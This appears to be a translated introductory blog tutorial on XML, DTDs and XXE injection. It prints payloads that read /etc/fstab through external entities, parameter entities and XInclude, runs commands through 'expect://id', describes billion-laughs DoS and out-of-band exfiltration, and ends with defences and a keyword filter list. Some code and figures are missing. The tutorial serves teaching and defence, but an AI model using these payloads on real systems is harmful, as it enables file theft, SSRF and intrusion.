safe customer, safe information platform

Posted by barello at 2020-03-08

Author: King Jiyue


Have you heard of XML injection attacks, but only half understand them?

Let's start with the basics of XML and work step by step through the principles and methods of XML attacks.

This article is mainly an introductory primer. Please go easy on it, and point out any mistakes you find.

XML is designed to transmit and store data, and its focus is the content of data.

HTML is designed to display data, with the focus on the appearance of the data.

XML separates data from HTML.

XML is a software and hardware independent information transmission tool.

<bookstore>                                    <!-- root element -->
  <book category="COOKING">                    <!-- child of bookstore; category is an attribute -->
    <title lang="en">Everyday Italian</title>  <!-- child of book; lang is an attribute -->
    <author>Giada De Laurentiis</author>       <!-- child of book -->
    <year>2005</year>                          <!-- child of book -->
    <price>30.00</price>                       <!-- child of book -->
  </book>                                      <!-- end of book -->
</bookstore>                                   <!-- end of bookstore -->
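To make the tree structure concrete, here is a minimal sketch that walks a document modelled on the bookstore example using Python's standard xml.etree.ElementTree module. The helper name describe is made up for illustration.

```python
import xml.etree.ElementTree as ET

# Sample document modelled on the bookstore example.
BOOKSTORE = """
<bookstore>
  <book category="COOKING">
    <title lang="en">Everyday Italian</title>
    <author>Giada De Laurentiis</author>
    <year>2005</year>
    <price>30.00</price>
  </book>
</bookstore>
"""


def describe(xml_text):
    """Return the root tag and a (category, title, price) tuple per book."""
    root = ET.fromstring(xml_text)
    books = [
        (book.get("category"), book.findtext("title"), float(book.findtext("price")))
        for book in root.findall("book")
    ]
    return root.tag, books


if __name__ == "__main__":
    print(describe(BOOKSTORE))
```

Attributes are read with get(), while child element content is read with findtext(), which mirrors the element/attribute split annotated in the example.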

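In XML, some characters have special meanings. For example, a "<" placed inside an element makes the parser treat it as the start of a new element, which produces an error. To avoid this error, use entity references instead of the special characters.

Table 1: predefined entity references in XML

&lt;      <    less than
&gt;      >    greater than
&amp;     &    ampersand
&apos;    '    apostrophe
&quot;    "    quotation mark

Note to table 1: in XML, only the characters "<" and "&" are strictly illegal. The greater-than sign is legal, but it is good practice to replace it with an entity reference.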
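As a small illustration of the escaping rule, the sketch below uses the standard xml.sax.saxutils helpers. The function names to_xml_text and to_attribute_text are hypothetical wrappers added for this example.

```python
from xml.sax.saxutils import escape, unescape


def to_xml_text(raw):
    """Escape &, < and > so the string is safe as element content."""
    return escape(raw)


def to_attribute_text(raw):
    """Additionally escape quote characters for use inside an attribute value."""
    return escape(raw, {'"': "&quot;", "'": "&apos;"})


if __name__ == "__main__":
    print(to_xml_text("if a < b & b > c"))
    print(to_attribute_text('say "hi"'))
    # unescape() reverses the three default replacements.
    print(unescape(to_xml_text("if a < b & b > c")))
```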

A valid XML document is a "well-formed" XML document that also conforms to the rules of a document type definition (DTD).

DTD introduction

A document type definition (DTD) defines the legal building blocks of an XML document. It defines the structure of the document with a list of legal elements.

A DTD can be declared inline in an XML document or as an external reference.

Example XML document with an internal DTD

<?xml version="1.0"?>
<!DOCTYPE note [                           <!-- declares this document to be of type note -->
  <!ELEMENT note (to,from,heading,body)>   <!-- note has four child elements -->
  <!ELEMENT to (#PCDATA)>                  <!-- to is of type #PCDATA -->
  <!ELEMENT from (#PCDATA)>                <!-- from is of type #PCDATA -->
  <!ELEMENT heading (#PCDATA)>             <!-- heading is of type #PCDATA -->
  <!ELEMENT body (#PCDATA)>                <!-- body is of type #PCDATA -->
]>
<note>
  <to>Dave</to>
  <from>Tom</from>
  <heading>Reminder</heading>
  <body>You are a good man</body>
</note>



When the DTD is located outside the XML source file, it is wrapped in a DOCTYPE definition using the following syntax:

<!DOCTYPE root-element SYSTEM "filename">

External DTD example

<?xml version="1.0"?>
<!DOCTYPE note SYSTEM "note.dtd">   <!-- declaration statement -->
<note>
  <to>Dave</to>
  <from>Tom</from>
  <heading>Reminder</heading>
  <body>You are a good man</body>
</note>

The "note.dtd" file

<!ELEMENT note (to,from,heading,body)>   <!-- note has four child elements -->
<!ELEMENT to (#PCDATA)>                  <!-- to is of type #PCDATA -->
<!ELEMENT from (#PCDATA)>                <!-- from is of type #PCDATA -->
<!ELEMENT heading (#PCDATA)>             <!-- heading is of type #PCDATA -->
<!ELEMENT body (#PCDATA)>                <!-- body is of type #PCDATA -->



PCDATA means parsed character data. PCDATA is text that will be parsed by the parser, which examines it for entities and markup. Tags inside the text are treated as markup, and entities are expanded. Parsed character data should therefore not contain any &, < or > characters; they need to be replaced with the &amp;, &lt; and &gt; entities, respectively.

CDATA means character data. CDATA is text that will not be parsed by the parser. Tags inside the text are not treated as markup, and entities are not expanded.
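The difference can be observed with a short sketch using Python's standard xml.etree.ElementTree. The two sample documents are made up for illustration: the same characters are parsed as markup in one case and kept literally inside a CDATA section in the other.

```python
import xml.etree.ElementTree as ET

# Same characters, once as parsed content and once wrapped in CDATA.
PCDATA_DOC = "<msg>1 &lt; 2 <b>bold</b></msg>"
CDATA_DOC = "<msg><![CDATA[1 &lt; 2 <b>bold</b>]]></msg>"

parsed = ET.fromstring(PCDATA_DOC)
literal = ET.fromstring(CDATA_DOC)

if __name__ == "__main__":
    # Parsed: the entity is expanded and <b> becomes a child element.
    print(repr(parsed.text), [child.tag for child in parsed])
    # CDATA: nothing is expanded and no child element is created.
    print(repr(literal.text), [child.tag for child in literal])
```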

DTD element

Note: since this is only background reading, only some common element syntax is shown

DTD - attributes

Attribute declarations use the following syntax:

<!ATTLIST element-name attribute-name attribute-type default-value>

DTD example:

<!ATTLIST payment type CDATA "check">

XML example:

<payment type="check" />

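The attribute type can be one of the following: CDATA, an enumerated list (en1|en2|..), ID, IDREF, IDREFS, NMTOKEN, NMTOKENS, ENTITY, ENTITIES, or NOTATION.

The default value can be one of the following: a literal value, #REQUIRED, #IMPLIED, or #FIXED value.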

DTD – entity (important)

Entities are variables used to define shortcuts to plain text or special characters.

An entity reference is a reference to an entity.

Entities can be declared internally or externally.
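A minimal sketch of an internally declared entity, assuming Python's standard xml.etree.ElementTree parser. The entity names writer and copyright and their values are made up for illustration.

```python
import xml.etree.ElementTree as ET

# Two internal entities are declared in the DTD and referenced in the body.
DOC = """<?xml version="1.0"?>
<!DOCTYPE note [
  <!ENTITY writer "Tom">
  <!ENTITY copyright "Copyright example.com">
]>
<note><from>&writer;</from><footer>&copyright;</footer></note>"""

note = ET.fromstring(DOC)

if __name__ == "__main__":
    # The parser replaces each entity reference with the declared text.
    print(note.findtext("from"))
    print(note.findtext("footer"))
```

An external entity is declared the same way but with SYSTEM and a URI in place of the quoted value, which is what the attacks below build on.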

Introduction to schema (XSD)

XML Schema is an XML-based alternative to DTD.

XML Schema describes the structure of an XML document.

The XML Schema language is also referred to as XSD (XML Schema Definition).

At present, however, XSD has little to do with the XXE attacks covered in this article. If you want to know more about it, you can study it separately.

Attack techniques

Common techniques:

1. Remote file reading by referencing external entities

2. URL request (through which SSRF can be initiated)

3. Parameter entity

4. Include external resources through XInclude


1. External entity reference

Remote file content can be obtained through external entity reference

Local experiment:

The content in the test.txt file is 123admin
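The sketch below shows the general shape of such an external entity document and what the parser is asked to load. It is an assumption-laden illustration, not the article's own payload: the path file:///tmp/test.txt and the names root and xxe are placeholders. It uses Python's standard xml.parsers.expat and only records the reference; nothing is fetched.

```python
import xml.parsers.expat

# General shape of an external entity document; the path is a placeholder.
PAYLOAD = """<?xml version="1.0"?>
<!DOCTYPE root [
  <!ENTITY xxe SYSTEM "file:///tmp/test.txt">
]>
<root>&xxe;</root>"""


def list_external_references(xml_text):
    """Return the system IDs of external entities referenced in xml_text.

    Nothing is loaded: the handler only records what a permissive parser
    would have been asked to fetch.
    """
    seen = []

    def on_external_entity(context, base, system_id, public_id):
        seen.append(system_id)
        return 1  # non-zero tells expat to carry on without loading anything

    parser = xml.parsers.expat.ParserCreate()
    parser.ExternalEntityRefHandler = on_external_entity
    parser.Parse(xml_text, True)
    return seen


if __name__ == "__main__":
    print(list_external_references(PAYLOAD))
```

A vulnerable parser would resolve that system ID itself and substitute the file content for the entity reference in the element.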

But there is a problem. If the file content is too complex, XML parsing will fail (for example, when the content contains spaces or special characters such as <, >, & and ;).

There are ways around this. As mentioned above, parameter entities can be used; the details are introduced later.

Another known method is the PHP wrapper php://filter, which can read the file contents Base64-encoded, so that no formatting can interfere with parsing.

2. URL request (SSRF)

A request can be initiated directly with an external entity reference, because many XML parsers issue the request as soon as they read the declaration that references the external resource.

Local experiment:

First, listen to port 1231 at

Using XML to make request at (just put XML into browser)

As shown in the figure above, the browser keeps loading because the 153 machine returns no data

1231 port status of

This SSRF is worth noting. Most attacks on XML rely on external entity references, so what happens if external entity references are forbidden when the XML is loaded?

In that case most attacks fail, but SSRF does not.

Don't forget that there is another way to request external resources: use DOCTYPE directly.

3. DoS

Any method that ties up a large amount of server resources can cause DoS. The principle here is recursive reference.

The lol entity holds the string "lol". A lol2 entity then references lol 10 times, and a lol3 entity references lol2 10 times, so lol3 contains 10^2 "lol" strings. Continuing in the same way, lol9 contains 10^8 "lol" strings.

So, reference lol9, and boom.
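The growth can be checked with a small sketch. The helper names expanded_count and build_nested_entities are hypothetical. The document built here is deliberately tiny (three levels, 100 copies), so it is safe to parse with the standard xml.etree.ElementTree; the nine-level figure is only computed, never expanded.

```python
import xml.etree.ElementTree as ET


def expanded_count(level, fanout=10):
    """Number of "lol" strings inside the entity at the given level (lol is level 1)."""
    return fanout ** (level - 1)


def build_nested_entities(levels, fanout):
    """Build a document whose top entity nests `levels` deep with `fanout` references each."""
    decls = ['<!ENTITY lol "lol">']
    for n in range(2, levels + 1):
        previous = "lol" if n == 2 else "lol%d" % (n - 1)
        refs = ("&%s;" % previous) * fanout
        decls.append('<!ENTITY lol%d "%s">' % (n, refs))
    top = "lol" if levels == 1 else "lol%d" % levels
    return "<!DOCTYPE lolz [%s]><lolz>&%s;</lolz>" % ("".join(decls), top)


if __name__ == "__main__":
    small = build_nested_entities(levels=3, fanout=10)
    text = ET.fromstring(small).text
    print(len(small), "bytes of input expand to", text.count("lol"), "copies")
    # Nine levels are only computed here, not parsed.
    print("lol9 would hold", expanded_count(9), "copies, about",
          3 * expanded_count(9), "bytes")
```

The input grows linearly with the number of levels while the expanded text grows exponentially, which is what exhausts memory on a parser without expansion limits.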

4. Parameter entity

As mentioned in the section on remote file reading, parameter entities can bypass the parsing failures caused by complex file content.

Parameter entities begin with %. We only need to follow two rules when using them:

1. Parameter entities can only be used inside DTD declarations.
2. Inside the internal DTD subset, a parameter entity cannot be referenced within another entity declaration, which is why the combining declaration is placed in an external DTD.

As shown in the figure, /etc/fstab is a file with complex content. If you request it directly with SYSTEM, parsing fails and the file content cannot be read.

Parameter entities can then be used to get around XML's strict syntax rules.

The process is actually very simple:

Content of the start parameter entity: <![CDATA[

Content of the goodies parameter entity: file:///etc/fstab (uses the file protocol to read the file)

Content of the end parameter entity: ]]>

Then a dtd parameter entity is defined, which uses SYSTEM to fetch the content of combine.dtd.

The dtd parameter entity is then referenced in the DTD. At this point, the DTD in the source file is effectively as follows:

<!ENTITY % start "<![CDATA[">
<!ENTITY % goodies SYSTEM "file:///etc/fstab">
<!ENTITY % end "]]>">
<!ENTITY % dtd SYSTEM "">
<!ENTITY all "%start;%goodies;%end;">

Finally, the source file references the general entity all, which causes the file to be read:

<roottag><![CDATA[contents of the /etc/fstab file]]></roottag>

The CDATA wrapper marks the file content as ordinary characters that are not parsed.

Because the pieces are assembled through parameter entity references, the file content does not have to be well-formed on its own when the XML document is parsed; the XML parser simply ignores the markup rules for the wrapped content, which achieves the bypass.

Attacker IP: eval.dtd 1.php

Server IP 2.php

The attacker's web directory holds the eval.dtd file used for the attack. Then upload 2.php to the server and execute it.

It does not matter if an error is reported.

Here's the code:


It simply accepts the content passed in the GET parameter and saves it to 1.txt
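The receiving logic can be sketched in Python as a stand-in for the PHP script, which this sketch does not reproduce. The function name save_file_param is hypothetical, and the parameter name file and the output name 1.txt follow the description above; only the parsing and saving step is shown, not a web server.

```python
from urllib.parse import parse_qs, urlparse


def save_file_param(request_target, out_path):
    """Extract the `file` GET parameter from a request target and save it.

    Returns the saved content (an empty string if the parameter is absent).
    """
    query = urlparse(request_target).query
    values = parse_qs(query).get("file", [])
    content = values[0] if values else ""
    with open(out_path, "w", encoding="utf-8") as handle:
        handle.write(content)
    return content


if __name__ == "__main__":
    # The request target below is a made-up example of what the receiver would see.
    print(save_file_param("/1.php?file=123admin", "1.txt"))
```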

The content of eval.dtd file is

Note that inside the entity value, the % of the nested parameter entity declaration must be written as &#x25;. Because this is a nested declaration inside an external parameter entity, using % directly means the parameter entity name cannot be found when it is referenced.

Its purpose is to append the content of the %file; entity, which holds the external file, to the request 1.php?file=

In this way, the file content read on the server is passed in the file parameter and saved to 1.txt

In the 2.php file:

The first entity reads the server's local file test.txt.

The second references the remote DTD file.

Pay attention to the order in which the entities are used. First, the entity named dtd is referenced, which loads the attacker's eval.dtd and yields the definition of the send entity with file=%file;

Then the content obtained by the file entity is substituted into file=.

At this point, the attacker's server saves 1.txt.

As mentioned earlier, when the file being read contains spaces or angle brackets, reading the content directly in this way reports an error.

An invalid URL error is displayed, and no request to file= can be captured from the browser.

Combined with the protocol support described earlier, you can use the common php://filter to read the file as Base64.

As follows:

Just decode the result.
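Decoding is a single call in most languages. A minimal Python sketch, where the function name decode_filter_output is hypothetical and the sample is generated locally to stand in for real php://filter output:

```python
import base64


def decode_filter_output(encoded):
    """Decode Base64 text, such as php://filter output, back to readable text."""
    return base64.b64decode(encoded).decode("utf-8", errors="replace")


# Stand-in for captured output: content with spaces and angle brackets.
sample = base64.b64encode(b"123admin <tag> & more").decode("ascii")

if __name__ == "__main__":
    print(sample)
    print(decode_filter_output(sample))
```

The encoded form contains no spaces, angle brackets, or ampersands, which is why it survives both XML parsing and the URL.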

Only a few protocols were chosen as examples; any of the protocols listed here can be used.

Here are some English documents and examples about the XXE vulnerability:

Http:// - Z-blog arbitrary file read

5. Include external resources through XInclude

XInclude-based file inclusion relies on another set of XML syntax constraints: XML Schema.

XInclude provides a more convenient way to retrieve data (there is no need to worry that incomplete data will make the parser throw an error), and the parse attribute lets us force the type the referenced file is treated as.

<root xmlns:xi="">  <xi:include href="file:///etc/fstab" parse="text"/> </root>

However, XInclude has to be turned on manually; all XML parsers have it turned off by default.
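Python's standard library illustrates the "turned on manually" point: parsing alone leaves the include element untouched, and inclusion only happens when xml.etree.ElementInclude.include() is called explicitly. In this sketch the loader fake_loader is a hypothetical stand-in that returns canned text instead of reading a file, and the href test.txt is a placeholder.

```python
import xml.etree.ElementTree as ET
from xml.etree import ElementInclude

DOC = """<root xmlns:xi="http://www.w3.org/2001/XInclude">
  <xi:include href="test.txt" parse="text"/>
</root>"""


def fake_loader(href, parse, encoding=None):
    """Hypothetical loader: returns canned text rather than touching the disk."""
    if parse == "text":
        return "123admin <not> parsed"
    return None


root = ET.fromstring(DOC)
children_before = len(root)  # the xi:include element is still present

# Inclusion is an explicit, separate step.
ElementInclude.include(root, loader=fake_loader)

if __name__ == "__main__":
    print(children_before, len(root))
    print(repr(root.text))
```

With parse="text" the included content is inserted as character data, so angle brackets in it do not need to form well-formed XML.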

PHP and Java environment

Extension protocol supported by PHP


The default XML parser under Oracle's Java runtime environment is Xerces, an Apache project. Xerces and Java provide a range of features, some of which can lead to serious security problems. The attack techniques above (DOCTYPE for SSRF, file reading, and out-of-band data transfer via parameter entities) can be used freely under Java's default configuration. Java/Xerces also supports XInclude, but it requires setXIncludeAware(true) and setNamespaceAware(true).

RCE with PHP & expect

Unfortunately, the expect extension is not installed by default. Where it is installed, however, an XXE vulnerability can use it to execute arbitrary commands.

<!DOCTYPE root[<!ENTITY cmd SYSTEM "expect://id">]> <dir> <file>&cmd;</file> </dir>

There are also Python, .NET, and other environments.


1. Use the methods provided by the development language to disable external entities

Note that this alone cannot defend against SSRF made through XML.




Java:

DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
dbf.setExpandEntityReferences(false);

Python:

from lxml import etree
xmlData = etree.parse(xmlSource, etree.XMLParser(resolve_entities=False))
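Since a DOCTYPE on its own can still trigger a request, a stricter option is to refuse any document that carries a DOCTYPE declaration at all. The following is a minimal sketch of that idea using Python's standard xml.parsers.expat. It is a different technique from the snippets above, and the names DTDForbidden and parse_without_dtd are hypothetical.

```python
import xml.parsers.expat


class DTDForbidden(ValueError):
    """Raised when a document contains a DOCTYPE declaration."""


def parse_without_dtd(xml_text):
    """Check that xml_text is well-formed and contains no DOCTYPE declaration."""

    def on_doctype(name, system_id, public_id, has_internal_subset):
        # Abort as soon as the declaration starts, before any entity is defined.
        raise DTDForbidden("DOCTYPE %r is not allowed" % name)

    parser = xml.parsers.expat.ParserCreate()
    parser.StartDoctypeDeclHandler = on_doctype
    parser.Parse(xml_text, True)
    return True


if __name__ == "__main__":
    print(parse_without_dtd("<note><to>Dave</to></note>"))
    try:
        parse_without_dtd('<!DOCTYPE note SYSTEM "note.dtd"><note/>')
    except DTDForbidden as exc:
        print("rejected:", exc)
```

This only suits applications that never need DTDs, since legitimate documents with a DOCTYPE are rejected too.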

2. Filter XML data submitted by users

Sensitive keywords: <!DOCTYPE, <!ENTITY, SYSTEM, PUBLIC
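A keyword filter of this kind might look like the sketch below. The pattern and the function name looks_dangerous are assumptions for illustration. Matching is case-insensitive to be conservative, even though the XML keywords themselves are case-sensitive.

```python
import re

# Keywords taken from the list above.
SENSITIVE = re.compile(r"<!DOCTYPE|<!ENTITY|\bSYSTEM\b|\bPUBLIC\b", re.IGNORECASE)


def looks_dangerous(xml_text):
    """Return True if the submitted XML contains any of the sensitive keywords."""
    return SENSITIVE.search(xml_text) is not None


if __name__ == "__main__":
    print(looks_dangerous('<!DOCTYPE r [<!ENTITY x SYSTEM "file:///etc/fstab">]><r>&x;</r>'))
    print(looks_dangerous("<note><to>Dave</to></note>"))
```

A filter like this is coarse: it also flags harmless text that happens to contain the word "public" or "system", so it works best as an extra layer alongside parser configuration rather than on its own.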


XML attacks are mostly caused by the parser requesting external resources, and some protocol features make it easy to bypass XML format requirements. The main keywords are DOCTYPE (DTD declaration), ENTITY (entity declaration), and SYSTEM and PUBLIC (external resource requests).

The various techniques all come from flexible references to general entities and parameter entities.
